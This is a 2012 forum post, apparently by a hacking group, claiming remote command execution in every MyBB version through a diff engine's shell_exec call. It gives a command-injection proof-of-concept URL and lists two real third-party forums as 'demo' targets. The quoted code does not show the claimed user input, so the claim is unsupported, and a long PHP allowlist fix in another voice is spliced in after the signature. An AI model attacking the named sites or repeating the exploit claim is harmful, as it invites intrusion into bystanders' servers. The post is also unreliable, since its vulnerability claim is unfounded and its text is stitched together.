Summary of remote command execution in all MyBB versions
Posted 2012-10-24 17:46:00
#1 Original post
Source download: http://www.mybb.com/download/latest
File: /inc/3rdparty/diff/Diff/Engine/shell.php
Vulnerable code excerpt (the forum's word filter replaced "exec" and "command" with "*"; the identifiers are restored here as an assumption):
$fp = fopen($to_file, 'w');
fwrite($fp, implode("\n", $to_lines));
fclose($fp);
$diff = shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file);
unlink($from_file);
unlink($to_file);
Proof:
$_GET + shell_exec() = command execution
Vulnerability description:
An attacker might execute arbitrary system commands with this vulnerability. User-tainted data is used when building the command that will be executed on the underlying operating system. This vulnerability can lead to full server compromise.
Example vulnerable code:
exec("./crypto -mode " . $_GET["mode"]);
Proof of concept:
/index.php?mode=1;sleep 10;
Fix:
Limit the input to a very strict character subset or build a whitelist of allowed commands. Do not try to filter out evil commands. Avoid using system command execution functions altogether if possible.
$modes = array("r", "w", "a"); if(!in_array($_GET["mode"], $modes)) exit;
D3m0 :
http://www.minuteworkers.com/forum/inc/3rdparty/diff/Diff/Engine/shell.php?Find It In Source=RCE
http://www.artistsuniverse.org/forum/inc/3rdparty/diff/Diff/Engine/shell.php?Find It In Source=RCE
#########################################################
We are : K0242 | Nafsh | Ehram.shahmohamadi
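The whitelist fix above, written out as an added example (not MyBB's code and not from the advisory): the sample `crypto -mode` call is validated against the allowlist before anything reaches the shell, and the diff-engine case is covered by confining both temp-file paths to a known directory and shell-quoting them. The function names, the `./crypto` binary and the base directory are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// The allowlist from the post; anything else is rejected, never "cleaned".
const ALLOWED_MODES = ['r', 'w', 'a'];

/**
 * Returns the command line to run, or null when $mode is not allowlisted.
 * in_array(..., true) is strict so "0" or "" cannot loosely match a mode.
 */
function build_crypto_command(string $mode): ?string
{
    if (!in_array($mode, ALLOWED_MODES, true)) {
        return null;
    }
    // Defence in depth: even an allowlisted value is shell-quoted.
    return './crypto -mode ' . escapeshellarg($mode);
}

/**
 * Builds the diff command used by a shell diff engine, refusing to run
 * unless both files exist and resolve (realpath, so symlinks and "..")
 * inside $baseDir. Both paths are shell-quoted in the final command.
 */
function build_diff_command(string $from, string $to, string $baseDir, string $diffBin = 'diff'): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $quoted = [];
    foreach ([$from, $to] as $path) {
        $real = realpath($path);
        $prefix = $base . DIRECTORY_SEPARATOR;
        if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
            return null;                     // outside the base dir: refuse
        }
        $quoted[] = escapeshellarg($real);
    }
    return $diffBin . ' ' . implode(' ', $quoted);
}

// Constructed inputs: the allowlisted value passes, the post's PoC is rejected.
var_dump(build_crypto_command('r'));           // string "./crypto -mode 'r'"
var_dump(build_crypto_command('1;sleep 10;')); // NULL
$tmp = tempnam(sys_get_temp_dir(), 'diff');    // a real temp file, inside the base dir
var_dump(build_diff_command($tmp, $tmp, sys_get_temp_dir()) !== null); // bool(true)
var_dump(build_diff_command('/etc/hostname', $tmp, sys_get_temp_dir())); // NULL
unlink($tmp);
```

If the caller needs a result from the command, wrap `shell_exec()` around the non-null return value only; a null from either builder should become an HTTP 400, not a fallback to the raw input.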
All replies (2)
2012-10-24 17:51:00
First reply
Nice post, deserves a bump!
2012-10-24 17:52:00
Second reply
Replying after reading is a virtue!